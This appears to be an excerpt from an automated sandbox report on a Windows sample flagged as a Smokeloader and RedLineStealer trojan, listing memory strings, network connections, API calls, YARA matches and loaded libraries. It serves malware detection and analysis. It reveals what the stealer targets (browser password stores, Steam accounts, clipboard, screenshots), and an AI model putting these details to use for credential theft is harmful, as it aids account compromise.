            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.X-0EdX_w3eQf
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sfVXAKwWPXPT
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.3:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49779 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49788 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49811 version: TLS 1.2
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00431E20 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_00431E20
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00431E20 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_00431E20
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043302F GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,0_2_0043302F

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043B1A00_2_0043B1A0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00437A700_2_00437A70
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0040E2CE0_2_0040E2CE
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00420B400_2_00420B40
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00410B7A0_2_00410B7A
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00425B200_2_00425B20
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00422BF00_2_00422BF0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004375F00_2_004375F0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0040E6720_2_0040E672
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043EE700_2_0043EE70
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0040D6930_2_0040D693
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004087100_2_00408710
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0040AF300_2_0040AF30
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043F7800_2_0043F780
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004260500_2_00426050
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0041E0700_2_0041E070
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0042C8750_2_0042C875
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0042707B0_2_0042707B
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004180080_2_00418008
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004218100_2_00421810
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004260300_2_00426030
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004208C50_2_004208C5
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004288D00_2_004288D0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004188D80_2_004188D8
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004300E00_2_004300E0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004268B30_2_004268B3
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0041F1400_2_0041F140
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0041C9500_2_0041C950
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0041D9600_2_0041D960
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004059200_2_00405920
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0042E92B0_2_0042E92B
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043F1300_2_0043F130
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0042E13D0_2_0042E13D
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004391870_2_00439187
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004251A00_2_004251A0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004351A50_2_004351A5
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004122000_2_00412200
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00431A100_2_00431A10
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00415A360_2_00415A36
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043BAC00_2_0043BAC0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043DAC50_2_0043DAC5
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0040CACB0_2_0040CACB
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004082D00_2_004082D0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004062E00_2_004062E0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0040AA800_2_0040AA80
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00427AB80_2_00427AB8
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004293400_2_00429340
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0042834B0_2_0042834B
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004383600_2_00438360
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00408B700_2_00408B70
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004233000_2_00423300
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004093A00_2_004093A0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043F4500_2_0043F450
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004274580_2_00427458
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0042BC5E0_2_0042BC5E
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043E4620_2_0043E462
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004364670_2_00436467
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00417C6C0_2_00417C6C
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00404C000_2_00404C00
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00414C220_2_00414C22
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043E4D00_2_0043E4D0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00436D400_2_00436D40
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004075500_2_00407550
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043DD720_2_0043DD72
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0042BD050_2_0042BD05
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004225220_2_00422522
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004235C00_2_004235C0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00419DD00_2_00419DD0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0041D6500_2_0041D650
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004156600_2_00415660
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0041CE600_2_0041CE60
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0041DE200_2_0041DE20
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00424E300_2_00424E30
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043E6300_2_0043E630
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00418EC70_2_00418EC7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00402EE00_2_00402EE0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043E6E00_2_0043E6E0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00421EEF0_2_00421EEF
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00428EFC0_2_00428EFC
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00411E970_2_00411E97
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0041FEA50_2_0041FEA5
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043B6B00_2_0043B6B0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00405F400_2_00405F40
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004397500_2_00439750
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004067700_2_00406770
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043E7700_2_0043E770
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0041170F0_2_0041170F
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004237100_2_00423710
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00415F3C0_2_00415F3C
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004097C00_2_004097C0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004357D30_2_004357D3
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0042AF800_2_0042AF80
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00436FA00_2_00436FA0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004387A00_2_004387A0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A72070_2_024A7207
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0249221E0_2_0249221E
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0248E2D70_2_0248E2D7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024882840_2_02488284
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A03470_2_024A0347
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024AF3970_2_024AF397
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0249E3A40_2_0249E3A4
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0248F3A70_2_0248F3A7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0248A0370_2_0248A037
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0248D0C70_2_0248D0C7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024AF0D70_2_024AF0D7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0248E0870_2_0248E087
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024950970_2_02495097
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0249B1E70_2_0249B1E7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024761A70_2_024761A7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024986690_2_02498669
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024796070_2_02479607
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A66CE0_2_024A66CE
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024AF6B70_2_024AF6B7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A87340_2_024A8734
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024777B70_2_024777B7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024824670_2_02482467
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A540C0_2_024A540C
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024AB4070_2_024AB407
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024765470_2_02476547
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0248654C0_2_0248654C
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024745270_2_02474527
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024785370_2_02478537
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0247E5350_2_0247E535
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024995A70_2_024995A7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02491A770_2_02491A77
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A8A070_2_024A8A07
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02493A070_2_02493A07
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02479A270_2_02479A27
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A5A3A0_2_024A5A3A
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0249CADC0_2_0249CADC
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02473B770_2_02473B77
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02486B2D0_2_02486B2D
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02490B2C0_2_02490B2C
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024AEB370_2_024AEB37
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0248DBC70_2_0248DBC7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02475B870_2_02475B87
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0249EB920_2_0249EB92
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0248CBB70_2_0248CBB7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A78570_2_024A7857
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0247E8D90_2_0247E8D9
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0247D8FA0_2_0247D8FA
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0248C8AA0_2_0248C8AA
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0248D8B70_2_0248D8B7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024789770_2_02478977
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024819760_2_02481976
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024AB9170_2_024AB917
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024769D70_2_024769D7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024AF9E70_2_024AF9E7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A99B70_2_024A99B7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02474E670_2_02474E67
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0249BEC50_2_0249BEC5
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02487ED30_2_02487ED3
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0249BF6C0_2_0249BF6C
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024ADFD90_2_024ADFD9
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A6FA70_2_024A6FA7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A1C770_2_024A1C77
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024A7CD70_2_024A7CD7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0247ACE70_2_0247ACE7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02485C9D0_2_02485C9D
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024ADD2C0_2_024ADD2C
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024ABD270_2_024ABD27
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0247CD320_2_0247CD32
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02478DD70_2_02478DD7
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02480DE10_2_02480DE1
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02495D870_2_02495D87
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02490DA70_2_02490DA7
            Source: C:\Users\user\Desktop\filename.exeCode function: String function: 004080E0 appears 46 times
            Source: C:\Users\user\Desktop\filename.exeCode function: String function: 02478347 appears 75 times
            Source: C:\Users\user\Desktop\filename.exeCode function: String function: 00414910 appears 78 times
            Source: C:\Users\user\Desktop\filename.exeCode function: String function: 02484B77 appears 78 times
            Source: C:\Users\user\Desktop\filename.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 1856
            Source: filename.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: filename.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@13/2
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_008DB1B6 CreateToolhelp32Snapshot,Module32First,0_2_008DB1B6
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00437A70 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_00437A70
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7512
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\4e21d42a-5cb6-4a6b-955d-a527006430ffJump to behavior
            Source: filename.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\filename.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: filename.exe, 00000000.00000003.1423889435.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1407329170.0000000003063000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1413730651.0000000003045000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1423730983.0000000003046000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: filename.exeVirustotal: Detection: 52%
            Source: filename.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\filename.exeFile read: C:\Users\user\Desktop\filename.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\filename.exe "C:\Users\user\Desktop\filename.exe"
            Source: C:\Users\user\Desktop\filename.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 1856
            Source: C:\Users\user\Desktop\filename.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: msasn1.dllJump to behavior
